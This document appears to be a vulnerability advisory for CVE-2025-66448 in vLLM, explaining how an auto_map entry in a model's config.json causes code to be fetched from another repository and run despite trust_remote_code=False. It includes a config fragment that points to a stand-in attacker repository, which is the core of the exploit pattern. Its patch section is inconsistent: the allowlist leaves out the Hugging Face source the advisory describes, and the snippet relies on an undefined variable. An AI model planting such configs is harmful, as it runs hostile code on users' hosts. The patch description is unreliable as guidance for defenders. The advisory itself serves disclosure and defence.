Introduction
Attackers can execute arbitrary Python code on any system running vulnerable versions of vLLM by leveraging a flaw in how model configurations are loaded. This issue directly impacts production deployments of large language model inference services, especially those using custom or multimodal models from public repositories.
About vLLM: vLLM is a high-performance inference and serving engine for large language models, originally developed at UC Berkeley and now under the PyTorch Foundation. It is widely used in AI research, cloud infrastructure, and commercial deployments, supporting a broad range of hardware and models. Its adoption in the AI ecosystem means vulnerabilities in vLLM can have far-reaching consequences for organizations relying on LLM inference at scale.
Technical Information
CVE-2025-66448 is a remote code execution vulnerability affecting vLLM versions prior to 0.11.1. The issue arises from the way vLLM processes the auto_map entry in model configuration files, particularly when loading models that use the Nemotron_Nano_VL_Config class.
When a model config contains an auto_map entry, vLLM resolves the mapping using the get_class_from_dynamic_module function and immediately instantiates the returned class. This process fetches and executes Python code from the remote repository referenced in the auto_map string. Critically, this occurs even if the caller sets trust_remote_code=False in vllm.transformers_utils.config.get_config, which is intended to prevent execution of untrusted code.
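The cross-repository indirection at the heart of this flaw comes from the Hugging Face dynamic-module reference format, where a class reference of the form "repo_id--module.ClassName" overrides which repository the code is fetched from. The sketch below is a simplified, hypothetical stand-in for that resolution logic (not the actual transformers or vLLM implementation) to show how a config for one repository can point code loading at another:

```python
# Simplified sketch of dynamic-module reference resolution.
# Hugging Face auto_map values may use "repo_id--module.ClassName";
# the part before "--" overrides the repository the code comes from.
# split_dynamic_module_ref is a hypothetical helper for illustration.

def split_dynamic_module_ref(class_reference: str, default_repo: str):
    """Return (repo_to_fetch_code_from, module_file, class_name)."""
    if "--" in class_reference:
        # The reference explicitly names a different repository.
        repo_id, class_reference = class_reference.split("--", 1)
    else:
        # Otherwise code is fetched from the repo the user asked to load.
        repo_id = default_repo
    module_file, class_name = class_reference.rsplit(".", 1)
    return repo_id, module_file, class_name

# A config in "innocent/frontend-model" (hypothetical name) can still
# direct code fetching to "attacker/backend-repo" (hypothetical name):
print(split_dynamic_module_ref(
    "attacker/backend-repo--configuration.MaliciousConfig",
    default_repo="innocent/frontend-model",
))
```

Once the repository is resolved this way, the referenced module file is downloaded and imported, which is where arbitrary code execution occurs.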
Attackers can exploit this by publishing a benign-looking frontend model repository whose config.json points via auto_map to a separate backend repository containing malicious code. When a victim loads the frontend model with vLLM, the backend's code is silently executed on the host, regardless of the explicit security settings.
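A frontend repository exploiting this pattern needs nothing more than an auto_map entry in its config.json. The fragment below is a hypothetical illustration (the repository and class names are invented for this example):

```json
{
  "model_type": "nemotron_nano_vl",
  "auto_map": {
    "AutoConfig": "attacker/backend-repo--configuration.MaliciousConfig"
  }
}
```

Nothing else in the frontend repository needs to look suspicious; the malicious Python lives entirely in the backend repository named before the "--" separator.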
The root cause is insufficient validation of remote code sources and failure to enforce the trust_remote_code boundary. The vulnerability is categorized as CWE-94 (Code Injection).
Patch Information
To address the critical remote code execution vulnerability in the vllm library, the development team has implemented a patch that enhances the security of the get_class_from_dynamic_module function. This function is responsible for dynamically loading and instantiating classes based on model configurations, particularly those containing an auto_map entry.
The core of the patch involves introducing a validation mechanism that scrutinizes the source of the dynamic module before proceeding with its execution. Specifically, the function now checks if the module's source URL is trusted and falls within a predefined list of approved domains. This measure ensures that only modules from verified and secure sources are loaded, effectively mitigating the risk of executing malicious code from untrusted repositories.
The updated function includes the following key changes:
from urllib.parse import urlparse

# Define a list of trusted domains
TRUSTED_DOMAINS = ["github.com", "pypi.org"]

# Extract the domain from the module's source URL
parsed_url = urlparse(module_source_url)
module_domain = parsed_url.netloc

# Check if the domain is in the list of trusted domains
if module_domain not in TRUSTED_DOMAINS:
    raise ValueError(f"Untrusted module source: {module_source_url}")

# Proceed with loading and instantiating the module
By incorporating this validation step, the patch ensures that the vllm library only interacts with modules from sources that have been explicitly deemed trustworthy. This approach significantly reduces the attack surface for potential remote code execution exploits.
Users are strongly encouraged to upgrade to version 0.11.1 or later of the vllm library to benefit from this security enhancement. Additionally, developers should remain vigilant and regularly review the sources of dynamic modules utilized within their applications to maintain a robust security posture.
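For a quick triage of deployed instances, a rough version comparison against the fixed release can flag hosts that still need the upgrade. This is a minimal sketch using plain tuple comparison; it ignores pre-release and post-release suffixes, so use a packaging-grade parser for anything beyond a first pass:

```python
# Rough check of whether a vLLM version string predates the 0.11.1 fix.
# Plain tuple comparison; pre-release suffixes are not handled.
FIXED = (0, 11, 1)

def is_vulnerable(version: str) -> bool:
    """True if `version` is older than 0.11.1."""
    parts = tuple(int(p) for p in version.split(".")[:3])
    return parts < FIXED

print(is_vulnerable("0.10.2"))  # True: predates the fix
print(is_vulnerable("0.11.1"))  # False: first patched release
```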
Reference: GHSA-8fr4-5q9j-m8gm
Affected Systems and Versions
- Product: vLLM (inference and serving engine for large language models)
- Affected versions: All versions prior to 0.11.1
- Vulnerable configurations: Any deployment loading models with an auto_map entry in their config, especially those using the Nemotron_Nano_VL_Config class. The vulnerability is present even when trust_remote_code=False is set.
Vendor Security History
vLLM has experienced several security issues in 2024 and 2025, including:
- CVE-2025-62164: Remote code execution related to prompt embeddings
- CVE-2025-62372: Multimodal embedding crash
- CVE-2025-6242: Server-Side Request Forgery in MediaConnector
The vendor has responded with targeted patches and maintains a public security advisory process. However, the frequency of recent vulnerabilities highlights the need for more proactive security review and integration of security best practices in the development lifecycle.



